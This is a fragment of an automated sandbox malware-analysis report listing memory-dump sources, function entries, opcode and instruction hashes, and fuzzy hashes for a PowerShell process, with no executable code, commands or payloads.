                                                                                                                                                                                                          • Source File: 0000000F.00000002.1518358151.00007FFAAB2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2C0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab2c0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0dab636340845337eaf741015c1e7308223c5be60e36e9e7fe1829dbc68abafc
                                                                                                                                                                                                          • Instruction ID: 602cfa483135af22c437866ebd26b1a179167705ac79c682ea060d25cbd4415e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dab636340845337eaf741015c1e7308223c5be60e36e9e7fe1829dbc68abafc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E06823E0E91D1EA3A6A79C68080F56280DF162A071802B7E80CD3595EC049C1C07C1

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 00007FFAAB1F0715 Relevance: 8.9, Strings: 7, Instructions: 108COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (0($8,($H1($P/($p0($-($/(
                                                                                                                                                                                                          • API String ID: 0-4142635764
                                                                                                                                                                                                          • Opcode ID: 068ba99c99c9833bb442557e5e9f7910be72becc01db1bb118caf9ac5b85c5de
                                                                                                                                                                                                          • Instruction ID: bcc748b09abb0641e6695bed68919081190c0ac175b6dd55fb18b069a6a1f2dd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 068ba99c99c9833bb442557e5e9f7910be72becc01db1bb118caf9ac5b85c5de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F331A78391FBD14FF21A96AC2C191A61F95EFA6794B1881FBE4CC4A4EB98449D0DC2D0
                                                                                                                                                                                                          Function 00007FFAAB1F0760 Relevance: 8.8, Strings: 7, Instructions: 93COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (0($8,($H1($P/($p0($-($/(
                                                                                                                                                                                                          • API String ID: 0-4142635764
                                                                                                                                                                                                          • Opcode ID: 89d974baf25f27c0f75f2b901cabeafce60e9d83fe353b14f9d976649a57461c
                                                                                                                                                                                                          • Instruction ID: 0611f0d49f9465e17e8918f0e3a55cd3390f88cd2ab2907302fc24aabeff0e3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89d974baf25f27c0f75f2b901cabeafce60e9d83fe353b14f9d976649a57461c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF21B58391FBD14FF22A96AC3C191A65F95EFA6794B1881FBE0CC4A4EF54449D0DC2C0
                                                                                                                                                                                                          Function 00007FFAAB1F02AD Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000F.00000002.1517790286.00007FFAAB1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1F0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ffaab1f0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @J($I$^$p@<$x.(
                                                                                                                                                                                                          • API String ID: 0-609340631
                                                                                                                                                                                                          • Opcode ID: 9eebeb592786e548dfe59cf4e18df16b7f9fe3b7b5fb5e8e302c6ae6532b8664
                                                                                                                                                                                                          • Instruction ID: 70179824420970b04ba5b44a56734fd485c58edd133d0ba1d823ab57c94a5c95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eebeb592786e548dfe59cf4e18df16b7f9fe3b7b5fb5e8e302c6ae6532b8664
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7571928390FBC15FE3574BB82C191656F90EF92694B5880FBE0CC8A4EBA8549E0DC3C5